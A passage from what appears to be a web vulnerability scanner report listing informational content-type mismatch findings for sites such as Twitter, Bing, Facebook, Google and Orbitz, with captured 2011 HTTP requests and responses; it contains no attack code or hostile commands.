Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1296667213
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCPJPud4tAToVaW5fbmV3X3VzZXJfZmxvdzA6%250AB2lkIiUwZWU5YmE5M2IzN2U4M2Y4NTU1ODc1MGJjZTQ2Y2E4OSIKZmxhc2hJ%250AQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVz%250AZWR7AA%253D%253D--0a212e703bac9709a6ddd2f1c5c5ab3b89a5d893; domain=.twitter.com; path=/
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Length: 34

TWTR.Widget.receiveCallback_1([]);

29.53. http://twitter.com/oexchange.xrd previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://twitter.com
Path:	/oexchange.xrd

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain XML.

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:30:06 GMT
Server: hi
Status: 200 OK
Last-Modified: Wed, 02 Feb 2011 01:43:52 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 760
Cache-Control: max-age=86400
Expires: Thu, 03 Feb 2011 16:30:06 GMT
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close

<?xml version='1.0' encoding='UTF-8'?>
<XRD xmlns='http://docs.oasis-open.org/ns/xri/xrd-1.0'>
<Subject>http://twitter.com</Subject>
<Property type='http://www.oexchange.org/spec/0.8/prop/vendor'>
...[SNIP]...

29.54. https://twitter.com/oexchange.xrd previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://twitter.com
Path:	/oexchange.xrd

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain XML.

Request

Response

29.55. http://urls.api.twitter.com/1/urls/count.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://urls.api.twitter.com
Path:	/1/urls/count.json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /1/urls/count.json HTTP/1.1
Host: urls.api.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=43838368.lang%3A%20en; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; k=173.193.214.243.1296227675375304;

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "6599c6d212c5eb6e41d800b7f8bf7397:1284511129"
Last-Modified: Wed, 15 Sep 2010 00:38:49 GMT
Accept-Ranges: bytes
Content-Length: 95
Content-Type: text/plain
Date: Thu, 03 Feb 2011 06:56:36 GMT
Connection: close
X-N: S

twttr.receiveCount({"errors":[{"code":48,"message":"Unable to access URL counting services"}]})

29.56. https://www.astaro.com/design/en/images/icons/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.astaro.com
Path:	/design/en/images/icons/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

29.57. http://www.bing.com/local/ypdefault.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/local/ypdefault.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

29.58. http://www.bing.com/search previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:02 GMT
Connection: close
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: _SS=SID=2E1A7F5BA7644A2BAA06833125336168; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:02 GMT; domain=.bing.com; path=/

Ref A: CD471770148240C79982106E3196FBEA Ref B: 0C751A30A3996A3A2BBDCAC1C65B761F Ref C: Wed Feb 02 07:44:02 2011
PST

29.59. http://www.bing.com/shopping previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/shopping

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:02 GMT
Connection: close
Set-Cookie: _SS=SID=174B2CCBF11A4337B3CF5638612D64AA; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

Ref A: 49D088005C31488781F05864A51CD0E0 Ref B: 1FEE72B1922FFBCA72900903677E5007 Ref C: Wed Feb 02 07:44:01 2011
PST

29.60. http://www.bing.com/shopping/pet-beds/c/5533 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/shopping/pet-beds/c/5533

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:01 GMT
Connection: close
Set-Cookie: _SS=SID=835633C5B9E34FC3BD3136F7AE025813; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

Ref A: 48D640698C34460DAAE41C3C67FB7747 Ref B: 44985E63E580B6F7BBB1992CC1B8CE47 Ref C: Wed Feb 02 07:44:01 2011
PST

29.61. http://www.bing.com/shopping/photo-storage-presentation/search previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/shopping/photo-storage-presentation/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:01 GMT
Connection: close
Set-Cookie: _SS=SID=75FB9386DCDD4B3784025AB4615440AB; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

Ref A: 9E4B693C63534AEC8EFC1CE11CF26677 Ref B: 6406D7D09DA422FFDA115320BAAB01E1 Ref C: Wed Feb 02 07:44:01 2011
PST

29.62. http://www.bing.com/shopping/search previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/shopping/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:01 GMT
Connection: close
Set-Cookie: _SS=SID=0D67D29194BA45D69B3158AB22258F94; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

Ref A: 34F80D9B975C49DE99B9E8D01C5CCE3D Ref B: 16662B1C5A04E819A85AA80B47D2B989 Ref C: Wed Feb 02 07:44:01 2011
PST

29.63. http://www.bing.com/shopping/televisions/c/4724 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/shopping/televisions/c/4724

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:01 GMT
Connection: close
Set-Cookie: _SS=SID=105E83DD783E4EBF96A309947C7C28C6; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

Ref A: A044AA7210B64A8095686515EB0FACF0 Ref B: F4E0CF88203B93940C3E52E56446540E Ref C: Wed Feb 02 07:44:01 2011
PST

29.64. http://www.bing.com/shopping/valentines-day-gift-ideas/r/144 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/shopping/valentines-day-gift-ideas/r/144

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:00 GMT
Connection: close
Set-Cookie: _SS=SID=3E69B16A4036442C8750E36A24D9491D; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:00 GMT; domain=.bing.com; path=/

Ref A: 367A39370974491D8EC7128B234EA825 Ref B: 1F8AC254D8EDFEE1F8710C039C017CCC Ref C: Wed Feb 02 07:44:00 2011
PST

29.65. http://www.bing.com/shopping/womens-workout-clothing/r/146 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/shopping/womens-workout-clothing/r/146

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:01 GMT
Connection: close
Set-Cookie: _SS=SID=80438C118EA246A18DDC72E701D38668; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

Ref A: 66F8F61938BD49A3B180BCB2435C3E8E Ref B: 7C7201EFEF67BB311F76467F0580E930 Ref C: Wed Feb 02 07:44:01 2011
PST

29.66. http://www.bing.com/travel/deals/cheap-flights-to-las-vegas.do previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/deals/cheap-flights-to-las-vegas.do

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:43:51 GMT
Connection: close
Set-Cookie: _SS=SID=AF7DBFF440CB4C92B41FAE4F6A61250D; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:51 GMT; domain=.bing.com; path=/

Ref A: A3BFA36425D94370B7B6306334C1ACD8 Ref B: 515AD692CE0335B6277C1A30A8375574 Ref C: Wed Feb 02 07:43:51 2011
PST

29.67. http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/destinations/orlando-florida-hotels-hostels-motels-1004643

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:43:52 GMT
Connection: close
Set-Cookie: _SS=SID=27FE84C2DCDE46E1930C9C9FE31D1EA9; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:52 GMT; domain=.bing.com; path=/

Ref A: 856ADD0ECD934AEAAB8686D00359423E Ref B: CFF6F7BD182B7180D1F1A7EEDD75B386 Ref C: Wed Feb 02 07:43:52 2011
PST

29.68. http://www.bing.com/travel/hotels previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/hotels

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:43:53 GMT
Connection: close
Set-Cookie: _SS=SID=5FF4597C29944F46AD1E896475146096; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:53 GMT; domain=.bing.com; path=/

Ref A: D21EFBC22FA94566A9345B8A941F116A Ref B: 5EF405CAC3BECA319DBF4BD733C05E5F Ref C: Wed Feb 02 07:43:53 2011
PST

29.69. https://www.ehow.com/forms/Support/DisplayCaptchaImage.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.ehow.com
Path:	/forms/Support/DisplayCaptchaImage.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg; charset=utf-8

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

Response

29.70. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 15:45:58 GMT
Content-Length: 22

Invalid Application ID

29.71. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.google.com
Path:	/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /search?sourceid=chrome&ie=UTF-8&q=LIGATT+Security+International HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: GeNLY2f-
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; SSDATA-DOMAIN=ikjREw(0:; TZ=360; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:35:44 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 21168

MsNN-Rbk....S....Y.....m...w.....\.9<!doctype html><head><title>LIGATT Security International.4...[UChITbbLLYa0lQfHqKzDBA",kEXPI:"17259,17291,27615,27683,27946,28067,28187,28387",kCSI:{e:"17259,17291,
...[SNIP]...

29.72. http://www.mensfitness.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mensfitness.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.mensfitness.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1509927900-1295974695655; __utmz=62324656.1297002490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/70; __utma=62324656.1003724549.1295974696.1295974696.1297002490.2; __utmc=62324656; __utmb=62324656.1.10.1297002490

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 09:35:39 GMT
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
ETag: "d023c-37e-40bd59e8fb3c0"
Last-Modified: Thu, 02 Feb 2006 20:27:03 GMT
Age: 17512
Cache-Control: max-age=43043
Via: HTTP/1.1 cdn.mensfitness.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Sun, 06 Feb 2011 21:33:02 GMT
Content-Type: text/plain; charset=UTF-8
Via: 1.1 mdw107104 (MII-APC/1.6)
Content-Length: 894

..............h.......(....... ................................................................................... &.
).. ... .-.... #
.6........3..6............#0."2..,.&.%9...!.).,F..#....>V.Ac. *q
...[SNIP]...

29.73. http://www.omniture.com/listener.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.omniture.com
Path:	/listener.html

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /listener.html?action=isol_views&type=ab_zone&creatives=652,289, HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_omniture=84542986.5892.0000; omniture_unique=c4b47f0affb47cea2cd263f6285f016c; cms_site_lang=1; use207=7; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; s_cid=natural_bookmark; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=check#true#1296661307|session#1296661217505-786518#1296663089|PC#1296661217505-786518.17#1299080429; s_sq=%5B%5BB%5D%5D; s_sv_p1=1@15@s/5084/5072&e/2; s_sv_s1=1@29@a//1296661247027/921914275979

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 02 Feb 2011 19:39:56 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 02 Sep 2010 20:55:05 GMT
xserver: www5.dmz
Content-Length: 73
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 15:39:57 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?><response status="true"></response>

29.74. http://www.orbitz.com/App/ViewTravelWatchHome previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/App/ViewTravelWatchHome

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

29.75. http://www.orbitz.com/cacheable/empty.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/cacheable/empty.html

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

29.76. http://www.orbitz.com/helper/populateStateList previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/helper/populateStateList

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

POST /helper/populateStateList HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/hotels/?z=4fae&r=1o
Origin: http://www.orbitz.com
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; adRotator=true; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573834583:ss=1296573790782; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; mbox=check#true#1296573897|session#1296573790873-999455#1296575697; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9
Content-Length: 41

models%5BcountryCode%5D.countryCode=US&_=

Response

29.77. http://www.orbitz.com/helper/smartfill previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/helper/smartfill

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

POST /helper/smartfill HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/hotels/?z=4fae&r=1o
Origin: http://www.orbitz.com
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; adRotator=true; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; 